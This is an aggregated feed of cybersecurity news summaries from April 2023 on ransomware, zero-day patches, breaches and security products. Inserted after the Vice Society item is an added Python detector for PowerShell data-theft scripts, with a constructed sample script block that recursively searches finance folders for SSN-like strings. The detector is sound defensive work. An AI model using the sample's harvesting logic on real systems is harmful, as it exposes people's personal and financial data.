                2023-04-16 https://www.helpnetsecurity.com/2023/04/16/week-in-review-microsoft-patches-zero-day-apple-security-updates-hashicorp-vault-vulnerability/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Making risk-based decisions in a rapidly changing cyber climate In this Help Net Security interview, Nicole reveals the three key indicators she uses to assess an industrial organization’s cybersecurity readiness and provides valuable insights for businesses and governments on fortifying their critical infrastructure against cyber threats. Data-backed insights for future-proof cybersecurity strategies In this Help Net Security interview, Travis Smith, … More

                The post Week in review: Microsoft patches zero-day, Apple security updates, HashiCorp Vault vulnerability appeared first on Help Net Security.

                Autosummary: New infosec products of the week: April 14, 2023. Here’s a look at the most interesting products from the past week, featuring releases from BigID, Binarly, Cynalytica, GitGuardian, Netskope, Searchlight Cyber, ThreatX, and Wazuh. Data-backed insights for future-proof cybersecurity strategies. In this Help Net Security interview, Travis Smith, VP of the Qualys TRU, talks about the 2023 Qualys TruRisk Threat Research Report, which provides security teams with data-backed insights to help them better understand how adversaries exploit vulnerabilities and render attacks.


                CISA warns of Android bug exploited by Chinese app to spy on users

                exploits
                2023-04-16 https://www.bleepingcomputer.com/news/security/cisa-warns-of-android-bug-exploited-by-chinese-app-to-spy-on-users/
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned today of a high-severity Android vulnerability believed to have been exploited by the Chinese e-commerce app Pinduoduo as a zero-day to spy on its users. [...]


                NCR was the victim of BlackCat/ALPHV ransomware gang

                exploits ransomware
                2023-04-16 https://securityaffairs.com/144866/cyber-crime/ncr-blackcat-alphv-ransomware.html

                NCR was the victim of the BlackCat/ALPHV ransomware gang, the attack caused an outage on the company’s Aloha PoS platform. NCR Corporation, previously known as National Cash Register, is an American software, consulting and technology company providing several professional services and electronic products. It manufactures self-service kiosks, point-of-sale terminals, automated teller machines, check processing systems, […]

                The post NCR was the victim of BlackCat/ALPHV ransomware gang appeared first on Security Affairs.


                LockBit ransomware encryptors found targeting Mac devices

                exploits ransomware
                2023-04-16 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-encryptors-found-targeting-mac-devices/
                The LockBit ransomware gang has created encryptors targeting Macs for the first time, likely becoming the first major ransomware operation to ever specifically target macOS. [...]

                Autosummary: Function names found in the macOS encryptor include _check_esxi, esxi_, _Esxi, _kill_esxi_1, _kill_esxi_2, _kill_esxi_3, _kill_processes, _kill_processes_Esxi, _killed_force_vm_id, _listvms, _esxcfg_scsidevs1, _esxcfg_scsidevs2, _esxcfg_scsidevs3, _esxi_disable and _esxi_enable. Furthermore, the encryptor contains a list of sixty-five file extensions and filenames that will be excluded from encryption, all of them being Windows file extensions and folders.


                Experts found the first LockBit encryptor that targets macOS systems

                ransomware
                2023-04-16 https://securityaffairs.com/144879/cyber-crime/lockbit-encryptor-targets-macos.html

                Researchers warn that the LockBit ransomware gang has developed encryptors to target macOS devices. The LockBit group is the first ransomware gang of all time that has created encryptors to target macOS systems, MalwareHunterTeam warns. MalwareHunterTeam researchers discovered the LockBit encryptors in a ZIP archive uploaded to VirusTotal. The discovery is disconcerting and demonstrates […]

                The post Experts found the first LockBit encryptor that targets macOS systems appeared first on Security Affairs.


                Daon brings IdentityX to healthcare industry

                industry
                2023-04-15 https://www.helpnetsecurity.com/2023/04/15/daon-expanding-identityx/

                Daon is expanding its IdentityX to the healthcare industry to enable organizations to safeguard identities for providers, staff, and patients. As the healthcare industry continues to digitize sensitive healthcare online information, cyber attacks increase and new regulations are established, Daon’s Fast Healthcare Interoperability Resources (FHIR)-compliant solutions will reduce fraud for healthcare workers and staff, digital health app providers, and patients. Daon IdentityX provides identity proofing and authentication solutions for every touchpoint – patient care, medical … More

                The post Daon brings IdentityX to healthcare industry appeared first on Help Net Security.


                Google Releases Urgent Chrome Update to Fix Actively Exploited Zero-Day Vulnerability

                exploits
                2023-04-15 https://thehackernews.com/2023/04/google-releases-urgent-chrome-update-to.html
                Google on Friday released out-of-band updates to resolve an actively exploited zero-day flaw in its Chrome web browser, making it the first such bug to be addressed since the start of the year. Tracked as CVE-2023-2033, the high-severity vulnerability has been described as a type confusion issue in the V8 JavaScript engine. Clement Lecigne of Google's Threat Analysis Group (TAG) has been


                CISA adds bugs in Android and Novi Survey to its Known Exploited Vulnerabilities catalog

                exploits
                2023-04-15 https://securityaffairs.com/144822/security/android-flaws-cisa-known-exploited-vulnerabilities-catalog.html

                US Cybersecurity and Infrastructure Security Agency (CISA) added Android and Novi Survey flaws to its Known Exploited Vulnerabilities catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the following five new issues to its Known Exploited Vulnerabilities Catalog: Google addressed the vulnerability CVE-2023-20963 with the release of “The Android Security Bulletin—March 2023” security updates. The […]

                The post CISA adds bugs in Android and Novi Survey to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.


                Hackers start abusing Action1 RMM in ransomware attacks

                exploits ransomware
                2023-04-15 https://www.bleepingcomputer.com/news/security/hackers-start-abusing-action1-rmm-in-ransomware-attacks/
                Security researchers are warning that cybercriminals are increasingly using the Action1 remote access software for persistence on compromised networks and to execute commands, scripts, and binaries. [...]

                Autosummary: “Last year we rolled out a threat actor filtering system that scans user activity for suspicious patterns of behavior, automatically suspends potentially malicious accounts, and alerts Action1’s dedicated security team to investigate the issue,” said Mike Walters. Action1 is working on including new measures to stop the misuse of the platform, the researcher said, adding that the company is “fully open to cooperation with both victims and legal authorities” on cases where Action1 was leveraged for cyberattacks.


                Android malware infiltrates 60 Google Play apps with 100M installs

                exploits
                2023-04-15 https://www.bleepingcomputer.com/news/security/android-malware-infiltrates-60-google-play-apps-with-100m-installs/
                A new Android malware named "Goldoson" has infiltrated the platform's official app store, Google Play, through 60 apps that collectively have 100 million downloads. [...]

                Autosummary: Some of the impacted apps are: L.POINT with L.PAY (10 million downloads); Swipe Brick Breaker (10 million); Money Manager Expense & Budget (10 million); GOM Player (5 million); LIVE Score, Real-Time Score (5 million); Pikicast (5 million); Compass 9: Smart Compass (1 million); GOM Audio - Music, Sync lyrics (1 million); LOTTE WORLD Magicpass (1 million); Bounce Brick Breaker (1 million); Infinite Slice (1 million); SomNote - Beautiful note app (1 million); Korea Subway Info: Metroid (1 million). According to McAfee's research team, which discovered Goldoson, the malware can collect data on installed apps, WiFi and Bluetooth-connected devices, and the user's GPS locations.


                NCR suffers Aloha POS outage after BlackCat ransomware attack

                exploits ransomware
                2023-04-15 https://www.bleepingcomputer.com/news/security/ncr-suffers-aloha-pos-outage-after-blackcat-ransomware-attack/
                NCR is suffering an outage on its Aloha point of sale platform after being hit by a ransomware attack claimed by the BlackCat/ALPHV gang. [...]

                Autosummary: "As a valued customer of NCR Corporation, we are reaching out with additional information about a single data center outage that is impacting a limited number of ancillary Aloha applications for a subset of our hospitality customers," reads an email sent to Aloha POS customers. Since its launch, the ransomware operation has grown into one of the most significant ransomware operations active at this time, responsible for hundreds of attacks worldwide, with ransom demands ranging from $35,000 to over $10 million.


                Tactics that make crypto giveaway scams so successful

                financial industry
                2023-04-14 https://www.helpnetsecurity.com/2023/04/14/tactics-crypto-giveaway-scams-video/

                The illicit market for crypto giveaway scams has expanded, offering various services to facilitate fraudulent activity. The proliferation of fake crypto giveaways can be attributed to the increased availability of tools for scammers, even those with limited technical skills. In this Help Net Security video, Tony Lauro, Director of Security Technology and Strategy at Akamai, discusses why crypto giveaway scams are so successful.

                The post Tactics that make crypto giveaway scams so successful appeared first on Help Net Security.


                Cymulate ASM bridges vulnerability management and ASM gaps in hybrid infrastructure

                exploits
                2023-04-14 https://www.helpnetsecurity.com/2023/04/14/cymulate-asm/

                Cymulate has expanded its Attack Surface Management (ASM) solution to close gaps between traditional vulnerability management and ASM. Organizations will now have advanced capabilities to easily visualize risky exposures across hybrid environments. The company achieves this by extending its coverage to include more attack surface discovery and added misconfiguration detection, cloud-specific analysis, and vulnerability discovery. Previously only for external attack surface management, the new enhancements will analyze Active Directory, Azure, GCP, and AWS Cloud footprints … More

                The post Cymulate ASM bridges vulnerability management and ASM gaps in hybrid infrastructure appeared first on Help Net Security.

                Autosummary: The enhancements support attack pathing and security validation across networks, clouds, and identity systems, including Active Directory services; deliver a more complete and detailed picture of viable attack paths and techniques than can be discovered by scanning only one infrastructure or the other; factor in that interconnections, trusts, permissions, and other variables can change the path of an attacker in unexpected ways; and provide the ability to clearly identify and see attack paths (displayed as graphs and detailed information), which delivers a quicker way to identify and close gaps without disrupting business operations. When paired with Cymulate Breach and Attack Simulation (BAS) technology, security teams can also validate whether controls that sit in the attack path successfully detect and alert on threat activity and, where remediation is required, know where that remediation can best be performed to reduce any business disruption.


                Severe Android and Novi Survey Vulnerabilities Under Active Exploitation

                exploits
                2023-04-14 https://thehackernews.com/2023/04/severe-android-and-novi-survey.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The two flaws are: CVE-2023-20963 (CVSS score: 7.8), Android Framework Privilege Escalation Vulnerability; and CVE-2023-29492 (CVSS score: TBD), Novi Survey Insecure Deserialization Vulnerability.

                Autosummary: "Android Framework contains an unspecified vulnerability that allows for privilege escalation after updating an app to a higher Target SDK with no additional execution privileges needed," CISA said in an advisory for CVE-2023-20963.


                Kodi Confirms Data Breach: 400K User Records and Private Messages Stolen

                financial
                2023-04-14 https://thehackernews.com/2023/04/kodi-confirms-data-breach-400k-user.html
                Open source media player software provider Kodi has confirmed a data breach after threat actors stole the company's MyBB forum database containing user data and private messages. What's more, the unknown threat actors attempted to sell the data dump comprising 400,635 Kodi users on the now-defunct BreachForums cybercrime marketplace. "MyBB admin logs show the account of a trusted but currently

                Autosummary: The nightly backups contained all public forum posts, team forum posts, messages sent through the user-to-user messaging system, and user information such as forum username, email address used for notifications, and a salted password hash (not a reversible encryption of the password) generated by the MyBB software.


                Russia accuses NATO of launching 5,000 cyberattacks since 2022

                ciber
                2023-04-14 https://www.bleepingcomputer.com/news/security/russia-accuses-nato-of-launching-5-000-cyberattacks-since-2022/
                The Federal Security Service of the Russian Federation (FSB) has accused the United States and other NATO countries of launching over 5,000 cyberattacks against critical infrastructure in the country since the beginning of 2022. [...]

                Autosummary: The FSB claims that despite many of the attacks being presented as activities by the "IT Army of Ukraine," it was able to discern the involvement of pro-west hacker groups such as "Anonymous," "Sailens," "Goast clan," "Ji-En-Ji," "SquadZOZ," and others.


                Kodi discloses data breach after its forum was compromised

                financial
                2023-04-14 https://securityaffairs.com/144793/data-breach/kodi-discloses-data-breach.html

                Open-source media player software provider Kodi discloses a data breach after threat actors stole its MyBB forum database. Kodi has disclosed a data breach, threat actors have stolen the company’s MyBB forum database that contained data for over 400K users and private messages. The threat actors also attempted to sell the stolen data on the […]

                The post Kodi discloses data breach after its forum was compromised appeared first on Security Affairs.


                Vice Society ransomware uses new PowerShell data theft tool in attacks

                exploits ransomware
                2023-04-14 https://www.bleepingcomputer.com/news/security/vice-society-ransomware-uses-new-powershell-data-theft-tool-in-attacks/
                The Vice Society ransomware gang is deploying a new, rather sophisticated PowerShell script to automate data theft from compromised networks. [...]

                Autosummary: For example, some of the folder name patterns it targets include: "*941*", "*1040*", "*1099*", "*8822*", "*9465*", "*401*K*", "*401K*", "*4506*T*", "*4506T*", "*Abkommen*", "*ABRH*", "*Abtretung*", "*abwickeln*", "*ACA*1095*", "*Accordi*", "*Aceito*", "*Acordemen*", "*Acordos*", "*Acuerde*", "*Acuerdo*", "*Addres*", "*Adres*", "*Affectation*", "*agreem*", "*Agreemen*Disclosur*", "*agreement*", "*Alamat*", "*Allocation*", "*angreifen*", "*Angriff*", "*Anmeldeformationen*", "*Anmeldeinformationen*", "*Anmeldenunter*", "*Anmeldung*", "*Anschrift*", "*Anspruch*", "*Ansspruch*", "*Anweisung*", "*AnweisungBank*", "*anxious*", "*Análise*", "*Apotheke*", "*ARH*", "*Asignación*", "*Asignatura*", "*Assegnazione*", "*Assignation*", "*Assignment*", "*Atribuição*", "*attorn*", "*Audit*", "*Auditnaadrese*", "*Aufführen*", "*Aufgabe*", "*Aufschühren*", "*Auftrag*", "*auftrunken*", "*Auftrunkinen*", "*Auswertung*", "*Avaliação*", "*Avaliações*", "*Avtal*", "*balanc*", "*bank*", "*Bargeld*", "*Belästigung*", "*Benef*", "*benefits*", "*Bericht*", "*Beschäftigung*", "*Betrug*", "*Bewertung*", "*bezahlen*", "*billing*", "*bio*". The PowerShell script uses system-native cmdlets like “Get-ChildItem” and “Select-String” to search and exfiltrate data from the infected machine, minimizing its footprint and maintaining a stealthy profile.
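                The article above says the Vice Society script pairs Get-ChildItem with Select-String and embeds a long list of folder-name wildcards. Because those cmdlets are also everyday admin tools, neither alone is a useful signal; the combination with the embedded wildcard list is. As an added example, not the tool's own code and not from BleepingComputer, here is detection logic in Python that scans PowerShell script block log text (the content of Event ID 4104) for that combination: an enumeration cmdlet (or its alias), a filtering cmdlet (or its alias), and at least five of the listed wildcards appearing literally in the script. The pattern subset, the hit threshold and the three sample script blocks are constructed for the example; the real list is far longer.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Subset of the folder-name wildcards the article lists; the real list is much
# longer and mixes English, German, Spanish, Portuguese and Italian.
TARGET_PATTERNS = [
    "*941*", "*1040*", "*1099*", "*401K*", "*4506T*", "*agreement*",
    "*Audit*", "*balanc*", "*bank*", "*benefits*", "*billing*",
    "*Anmeldeinformationen*", "*Betrug*", "*Acuerdo*", "*Avaliação*",
]

# How many of the wildcards must appear literally before the block is flagged.
# Assumed threshold; tune it against your own baseline of admin scripts.
MIN_HITS = 5

# The cmdlets the article names, plus the aliases PowerShell resolves them from,
# because script block logs record what was typed, not the canonical name.
ENUM_RE = re.compile(r"\b(Get-ChildItem|gci|dir|ls)\b", re.IGNORECASE)
FILTER_RE = re.compile(r"\b(Select-String|sls)\b", re.IGNORECASE)


@dataclass(frozen=True)
class Verdict:
    record_id: int
    enumerates: bool   # walks the filesystem
    filters: bool      # greps file contents
    pattern_hits: int  # how many known wildcards are embedded verbatim

    @property
    def suspicious(self) -> bool:
        # All three together is the shape the article describes; any one
        # alone is ordinary administration and would only generate noise.
        return self.enumerates and self.filters and self.pattern_hits >= MIN_HITS


def score_script_block(record_id: int, script: str) -> Verdict:
    """Score one 4104 script block text against the three indicators."""
    lowered = script.lower()
    hits = sum(1 for p in TARGET_PATTERNS if p.lower() in lowered)
    return Verdict(
        record_id,
        bool(ENUM_RE.search(script)),
        bool(FILTER_RE.search(script)),
        hits,
    )


def flag_events(events: Iterable[Tuple[int, str]]) -> List[int]:
    """Return the record IDs whose script block trips all three indicators."""
    return [
        v.record_id
        for v in (score_script_block(rid, text) for rid, text in events)
        if v.suspicious
    ]


# Constructed sample 4104 script block texts (not Vice Society's actual code):
# 101 mimics the described behaviour, 102 and 103 are benign admin one-liners.
SAMPLE_EVENTS = [
    (101, 'Get-ChildItem -Path C:\\ -Recurse -Directory | Where-Object { '
          '$_.Name -like "*1040*" -or $_.Name -like "*1099*" -or $_.Name -like "*bank*" '
          '-or $_.Name -like "*billing*" -or $_.Name -like "*agreement*" -or $_.Name -like "*Audit*" } '
          '| ForEach-Object { Get-ChildItem $_.FullName -Recurse -File '
          '| Select-String -Pattern "\\d{3}-\\d{2}-\\d{4}" }'),
    (102, 'Get-ChildItem C:\\inetpub\\logs -Filter *.log | Select-String -Pattern " 500 "'),
    (103, 'gci C:\\Users -Recurse | Where-Object Length -gt 1GB'),
]


if __name__ == "__main__":
    for rid, text in SAMPLE_EVENTS:
        v = score_script_block(rid, text)
        print(f"record {rid}: enum={v.enumerates} filter={v.filters} "
              f"hits={v.pattern_hits} suspicious={v.suspicious}")
```

                In production the script text comes from the ScriptBlockText field of Microsoft-Windows-PowerShell/Operational Event ID 4104, which requires script block logging to be enabled; long scripts are split across several 4104 records with the same ScriptBlockId, so join the fragments before scoring or the hit count will be diluted.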


                Microsoft expands Start menu ads test with new ‘treatments’

                financial
                2023-04-14 https://www.bleepingcomputer.com/news/microsoft/microsoft-expands-start-menu-ads-test-with-new-treatments/
                Microsoft is testing new ads in the Windows Start menu, or what it describes as "new treatments," for users logged into local accounts as part of a "badging" expansion. [...]

                Autosummary: New "treatments" on the Start Menu for Windows Insiders (Microsoft). The list of new "treatments" being tested in this Windows Insider build includes the following prompts: Sign in to your Microsoft account.


                Google Chrome emergency update fixes first zero-day of 2023

                exploits
                2023-04-14 https://www.bleepingcomputer.com/news/security/google-chrome-emergency-update-fixes-first-zero-day-of-2023/
                Google has released an emergency Chrome security update to address the first zero-day vulnerability exploited in attacks since the start of the year. [...]

                Autosummary: Google TAG frequently discovers and reports zero-day bugs exploited in highly-targeted attacks by government-sponsored threat actors aiming to install spyware on devices of high-risk individuals, including journalists, opposition politicians, and dissidents worldwide.


                Darktrace: Investigation found no evidence of LockBit breach

                ransomware
                2023-04-14 https://www.bleepingcomputer.com/news/security/darktrace-investigation-found-no-evidence-of-lockbit-breach/
                Cybersecurity firm Darktrace says it found no evidence that the LockBit ransomware gang breached its network after the group added an entry to their dark web leak platform, implying that they stole data from the company's systems. [...]


                Patch now to address a Windows zero-day

                exploits
                2023-04-14 https://www.computerworld.com/article/3693317/patch-now-to-address-windows-zero-day.html#tk.rss_security

                Microsoft has addressed 97 existing vulnerabilities this April Patch Tuesday, with a further eight previously released patches updated and re-released. There have been reports of a vulnerability (CVE-2023-28252) exploited in the wild, making it a "Patch Now" release.

                This update cycle affects Windows desktops, Microsoft Office, and Adobe Reader. No updates for Microsoft Exchange this month. The team at Application Readiness has provided a helpful infographic that outlines the risks associated with each of the updates for this April update cycle.

                Autosummary: Windows. This April, Microsoft released seven critical updates and 71 patches rated as Important to the Windows platform that cover the following key components (for the critical updates): Microsoft Message Queuing, Windows Layer 2 Tunneling Protocol and Windows DHCP Server. Unfortunately, this month there have been reports of a vulnerability (CVE-2023-28252) exploited in the wild, adding to our zero-day count. Updates by product family. Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge); Microsoft Windows (both desktop and server); Microsoft Office; Microsoft Exchange Server; Microsoft Development platforms (ASP.NET Core, .NET …). Mitigations and workarounds. Microsoft has published the following vulnerability-related mitigations for this month's April Patch Tuesday release cycle: CVE-2023-23397: To mitigate against this Microsoft Outlook elevation of privilege vulnerability, Microsoft recommends, "Administrators should add users to the Protected Users Security Group, which prevents the use of NTLM as an authentication mechanism." Browsers. This April patch cycle sees the return of patches to the Microsoft Edge browser platform with just three updates (CVE-2023-28284, CVE-2023-24935, and CVE-2023-28301), all rated as low by Microsoft. CVE-2023-23413, CVE-2023-24867, CVE-2023-24907, CVE-2023-24909: Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability.


                Safety first: 5 cybersecurity tips for freelance bloggers

                ciber
                2023-04-14 https://www.welivesecurity.com/2023/04/14/safety-first-5-cybersecurity-tips-bloggers/

                The much-dreaded writer’s block isn’t the only threat that may derail your progress. Are you doing enough to keep your blog (and your livelihood) safe from online dangers?

                The post Safety first: 5 cybersecurity tips for freelance bloggers appeared first on WeLiveSecurity

                Autosummary: Keep your CMS and plugins updated. When Ghost, Drupal, WordPress, Joomla, or another CMS tells you of the availability of a new version, act on it. 1. Use secure login credentials. Surprisingly, password security in today’s age is still lax, as people even now tend to use the same weak passwords that can be hacked in mere seconds; therefore, a healthy attitude toward passwords is a must. Said data might include emails for your newsletter, credit card numbers for purchases (or subscriptions, Patreon, etc.), and passwords.


                Google fixed the first Chrome zero-day of 2023

                exploits
                2023-04-14 https://securityaffairs.com/144805/security/google-chrome-zero-day-2023.html

                Google released an emergency security update to address a zero-day vulnerability in Chrome which is actively exploited in the wild. Google released an emergency security update to address the first Chrome zero-day vulnerability (CVE-2023-2033) in 2023, the company is aware of attacks in the wild exploiting the issue. The vulnerability is a Type Confusion issue that resides in the JavaScript engine […]

                The post Google fixed the first Chrome zero-day of 2023 appeared first on Security Affairs.


                The Week in Ransomware - April 14th 2023 - A Focus on Stolen Data

                exploits ransomware
                2023-04-14 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-14th-2023-a-focus-on-stolen-data/
                It has been mostly a quiet week regarding ransomware, with only a few bits of info released on older attacks and some reports released on existing organizations. [...]

                Autosummary: Contributors and those who provided new ransomware information and stories this week include @LawrenceAbrams, @demonslay335, @malwareforme, @malwrhunterteam, @fwosar, @BleepinComputer, @Seifreed, @struppigel, @billtoulas, @Ionut_Ilascu, @serghei, @McAfee, @Fortinet, @Threatlabz, @pcrisk, and @GossiTheDog.


                Is AI being used for virtual kidnapping scams?

                financial
                2023-04-14 https://www.malwarebytes.com/blog/news/2023/04/is-ai-now-being-used-for-virtual-kidnapping-scams

                Categories: News. Tags: kidnap, scam, virtual, AI, voice, fake, fraud, hoax, kidnapping

                We take a look at claims that AI is now being used for a notorious form of kidnapping hoax.

                The post Is AI being used for virtual kidnapping scams? appeared first on Malwarebytes Labs.

                Autosummary: The scammers dropped the ransom down to $50k after being told that the money simply wasn't available, and while all of this was going on, a friend of the family, and law enforcement, were able to confirm that the supposedly kidnapped daughter was in fact safe and well. It's definitely not an exact science, and getting the voice right can take many attempts and samples, and requires an AI tool that can stitch everything together to an acceptable standard. To hear for yourself, take a listen to podcast.ai, a podcast entirely generated by AI, that features guests like the late Steve Jobs.


                Votiro collaborates with Sumo Logic to provide analytics on file-borne threats

                industry
                2023-04-14 https://www.helpnetsecurity.com/2023/04/15/votiro-collaborates-with-sumo-logic-to-provide-analytics-on-file-borne-threats/

                Votiro has integrated with Sumo Logic to enable reliable and secure cloud-native applications. Users can now send high-fidelity data and insights discovered by Votiro Cloud into the Sumo Logic Cloud SIEM console. Enterprises are relying on collaboration platforms, cloud workloads and storage environments more than ever before. File sharing and Cloud data usage will continue to expand, providing more opportunities for bad actors to penetrate enterprise networks through file-borne malware. Sumo Logic’s Cloud SIEM automatically … More

                The post Votiro collaborates with Sumo Logic to provide analytics on file-borne threats appeared first on Help Net Security.

                Autosummary: “We are excited to announce this integration with Sumo Logic to arm security teams with an open, API-based solution to detect, disarm and respond to relevant threats,” Srinivasan added.


                A cyberattack on the Cornwall Community Hospital in Ontario is causing treatment delays

                financial ciber
                2023-04-14 https://securityaffairs.com/144811/cyber-crime/cyberattack-cornwall-community-hospital-ontario.html

                The Cornwall Community Hospital in Ontario, Canada, is under a cyber attack that is causing delays to scheduled and non-urgent care. The attack was discovered on Tuesday, April 11, 2023, and the hospital is investigating the incident with […]

                The post A cyberattack on the Cornwall Community Hospital in Ontario is causing treatment delays appeared first on Security Affairs.


                Brazil riots: Jair Bolsonaro ordered to testify by Supreme Court

                latam industry
                2023-04-14 https://www.bbc.co.uk/news/world-latin-america-65282559?at_medium=RSS&at_campaign=KARANGA
                Prosecutors say the ex-president incited riots by questioning the legitimacy of an election. "



                Wazuh 4.4 combats breaches, ransomware, and cyberattacks all from a single agent

                exploits ransomware ciber
                2023-04-13 https://www.helpnetsecurity.com/2023/04/13/wazuh-4-4/

                Wazuh launched Wazuh 4.4, the latest version of its open source security platform. The latest version adds multiple new features, including IPv6 support for the enrollment process and agent-manager connection, and support for Azure integration within Linux agents. Today’s leading enterprises require world-class protection of workloads across on-premises, virtualized, containerized, and cloud-based environments. Wazuh 4.4 enhances the comprehensive and customizable solution with greater flexibility to combat breaches, ransomware, and cyberattacks all from a single agent. … More

                The post Wazuh 4.4 combats breaches, ransomware, and cyberattacks all from a single agent appeared first on Help Net Security.

                "



                ChatGPT Security: OpenAI's Bug Bounty Program Offers Up to $20,000 Prizes

                exploits
                2023-04-13 https://thehackernews.com/2023/04/chatgpt-security-openais-bug-bounty.html
                OpenAI, the company behind the massively popular ChatGPT AI chatbot, has launched a bug bounty program in an attempt to ensure its systems are "safe and secure." To that end, it has partnered with the crowdsourced security platform Bugcrowd for independent researchers to report vulnerabilities discovered in its product in exchange for rewards ranging from "$200 for low-severity findings to up to "

                Autosummary: What's in scope, however, are defects in OpenAI APIs, ChatGPT (including plugins), third-party integrations, public exposure of OpenAI API keys, and any of the domains operated by the company.


                The new weakest link in the cybersecurity chain

                ciber
                2023-04-13 https://www.helpnetsecurity.com/2023/04/13/securing-attack-surface/

                It used to be that people were the greatest cybersecurity vulnerability, but this is no longer true. The rise of the internet made people more connected than ever. Attackers capitalized on that fact and targeted employees directly to gain access to an organization. Leveraging highly automated methods (such as phishing that redirects users to compromised websites), attackers must only fool one employee to start a catastrophic attack against the entire organization. These methods are extremely … More

                The post The new weakest link in the cybersecurity chain appeared first on Help Net Security.

                "

                Autosummary: These exposed systems are highly heterogeneous, including everything from database servers, core business applications, and workstations to embedded systems like cameras, IoT devices, and even building control systems, all scattered across the world wherever the company has a presence. Attackers have come to realize that such unmonitored systems present the same opportunity of access employees once did – namely, an attack surface that can be found and exploited using highly automated, low-cost methods. Thus, the employees-are-our-weakest-link mantra became an unquestioned industry dictum, embraced by both defenders and attackers.


                Lazarus Hacker Group Evolves Tactics, Tools, and Targets in DeathNote Campaign

                industry
                2023-04-13 https://thehackernews.com/2023/04/lazarus-hacker-group-evolves-tactics.html
                The North Korean threat actor known as the Lazarus Group has been observed shifting its focus and rapidly evolving its tools and tactics as part of a long-running activity called DeathNote. While the nation-state adversary is known for its persistent attacks on the cryptocurrency sector, it has also targeted automotive, academic, and defense sectors in Eastern Europe and other parts of the world

                Autosummary: While the nation-state adversary is known for its persistent attacks on the cryptocurrency sector, it has also targeted automotive, academic, and defense sectors in Eastern Europe and other parts of the world, in what's perceived as a "significant" pivot.


                Fortinet fixed a critical vulnerability in its Data Analytics product

                exploits industry
                2023-04-13 https://securityaffairs.com/144750/security/fortinet-critical-vulnerability-data-analytics.html

                Fortinet addressed a critical vulnerability that can lead to remote, unauthenticated access to Redis and MongoDB instances. Fortinet has addressed a critical vulnerability, tracked as CVE-2022-41331 (CVSS score of 9.3), in its Fortinet FortiPresence data analytics solution. FortiPresence is a comprehensive data analytics solution designed for analyzing user traffic and deriving usage patterns. Successful exploitation can […]

                The post Fortinet fixed a critical vulnerability in its Data Analytics product appeared first on Security Affairs.

                "



                Daniel Urresti: Peruvian ex-minister complicit in reporter's murder

                latam
                2023-04-13 https://www.bbc.co.uk/news/world-latin-america-65261946?at_medium=RSS&at_campaign=KARANGA
                Daniel Urresti is found guilty of involvement in the brutal 1988 killing of journalist Hugo Bustíos.



                Russian hackers linked to widespread attacks targeting NATO and EU

                rusia-ucrania
                2023-04-13 https://www.bleepingcomputer.com/news/security/russian-hackers-linked-to-widespread-attacks-targeting-nato-and-eu/
                Poland's Military Counterintelligence Service and its Computer Emergency Response Team have linked APT29 state-sponsored hackers, part of the Russian government's Foreign Intelligence Service (SVR), to widespread attacks targeting NATO and European Union countries. [...]



                WhatsApp boosts defense against account takeover via malware

                exploits
                2023-04-13 https://www.bleepingcomputer.com/news/security/whatsapp-boosts-defense-against-account-takeover-via-malware/
                WhatsApp announced today the introduction of several new security features, one of them dubbed "Device Verification" and designed to provide better protection against account takeover (ATO) attacks. [...]

                Autosummary: WhatsApp introduced end-to-end encryption 7 years ago, in April 2016, and rolled out end-to-end encrypted chat backups on iOS and Android in October 2021 to block access to chat contents, regardless of where they're stored.


                Google Launches New Cybersecurity Initiatives to Strengthen Vulnerability Management

                exploits ciber
                2023-04-13 https://thehackernews.com/2023/04/google-launches-new-cybersecurity.html
                Google on Thursday outlined a set of initiatives aimed at improving the vulnerability management ecosystem and establishing greater transparency measures around exploitation. "While the notoriety of zero-day vulnerabilities typically makes headlines, risks remain even after they're known and fixed, which is the real story," the company said in an announcement. "Those risks span everything from "



                RTM Locker: Emerging Cybercrime Group Targeting Businesses with Ransomware

                exploits ransomware
                2023-04-13 https://thehackernews.com/2023/04/rtm-locker-emerging-cybercrime-group.html
                Cybersecurity researchers have detailed the tactics of a "rising" cybercriminal gang called "Read The Manual" (RTM) Locker that functions as a private ransomware-as-a-service (RaaS) provider and carries out opportunistic attacks to generate illicit profit. "The "Read The Manual" Locker gang uses affiliates to ransom victims, all of whom are forced to abide by the gang's strict rules," "

                Autosummary: To that end, CIS countries, as well as morgues, hospitals, COVID-19 vaccine-related corporations, critical infrastructure, law enforcement, and other prominent companies are off-limits for the group.


                A flaw in the Kyocera Android printing app can be abused to drop malware

                exploits
                2023-04-13 https://securityaffairs.com/144759/hacking/kyocera-android-printing-app-flaw.html

                Security experts warn that a Kyocera Android printing app is vulnerable to improper intent handling and can be abused to drop malware. An improper intent handling issue affecting the Kyocera Android printing app can allow malicious applications to drop malware. Such kinds of flaws expose a resource to the wrong control sphere, providing unintended actors with inappropriate […]

                The post A flaw in the Kyocera Android printing app can be abused to drop malware appeared first on Security Affairs.

                "



                Microsoft: Phishing attack targets accountants as Tax Day approaches

                financial
                2023-04-13 https://www.bleepingcomputer.com/news/security/microsoft-phishing-attack-targets-accountants-as-tax-day-approaches/
                Microsoft is warning of a phishing campaign targeting accounting firms and tax preparers with remote access malware allowing initial access to corporate networks. [...]

                Autosummary: "I believe you would require a copy of our most recent year's documents, such as W-2s, 1099s, mortages, interest, donations, medical investments, HSAs, and so on which I have uploaded below."


                Ransomware review: April 2023

                exploits
                2023-04-13 https://www.malwarebytes.com/blog/threat-intelligence/2023/04/ransomware-review-april-2023

                Categories: Ransomware

                Categories: Threat Intelligence

                Cl0p was the most used ransomware in March 2023, dethroning the usual frontrunner LockBit, after breaching over 104 organizations with a zero-day vulnerability.


                The post Ransomware review: April 2023 appeared first on Malwarebytes Labs.

                "

